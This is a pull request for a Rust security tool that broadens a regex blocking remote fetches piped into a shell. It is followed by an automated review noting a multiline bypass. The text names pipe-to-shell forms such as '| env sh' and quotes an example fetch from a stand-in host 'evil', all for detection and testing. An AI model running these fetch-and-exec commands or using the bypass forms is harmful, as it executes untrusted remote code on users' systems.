security(policy): catch wrapped pipe-to-shell fetches

[StressTestor]

Motivation

• A recent tighten of the default pipe-to-shell deny regex narrowed matching so wrapper and multi-stage pipeline forms like curl … | env sh or curl … | /usr/bin/env bash no longer hit the block rule, reintroducing a bypass for remote fetch-and-exec patterns.
• The change restores the original intent: any remote fetch whose output eventually reaches a shell invocation should be blocked by the default enforce-mode policy.

Description

• Broaden the default fetch->shell deny pattern in src/install/defaults.rs from \b(curl|wget|fetch)\b[^|]*\|\s*[a-z/]*sh\b to \b(curl|wget|fetch)\b[^|]*\|.*\b[a-z/]*sh\b so wrapper commands and multi-stage pipelines after the first pipe match.
• Apply the same broadened regex to preflight lifecycle-script detection in src/preflight/mod.rs so lifecycle script scanning mirrors the shipped default policy.
• Add regression assertions to the default-policy tests and preflight tests that verify wrapped/multi-stage forms such as | env sh, | /usr/bin/env bash, | nice sh, and | tee … | sh are blocked.

Testing

• Ran targeted tests cargo test pipe_to_shell_still_blocks_after_curl_rules and cargo test blocks_postinstall_curl_pipe_to_shell, both of which passed.
• Ran the full test suite via cargo test, which completed with all tests passing (252 passed, 0 failed).

---

Codex Task

[chatgpt-codex-connector]

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 08b203c175

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

• Open a pull request for review
• Mark a draft as ready
• Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

[chatgpt-codex-connector]

Restore newline-safe pipe-to-shell matching

When the pipeline is formatted across lines, e.g. a Bash/package script containing curl https://evil/x |\nsh, this no longer matches because Rust regex . does not consume newlines; the previous \s* did. That reopens a simple multiline fetch-and-exec bypass in the shipped default policy (and the mirrored preflight regex uses the same pattern), while the new tests only exercise single-line wrapper pipelines.

Useful? React with 👍 / 👎.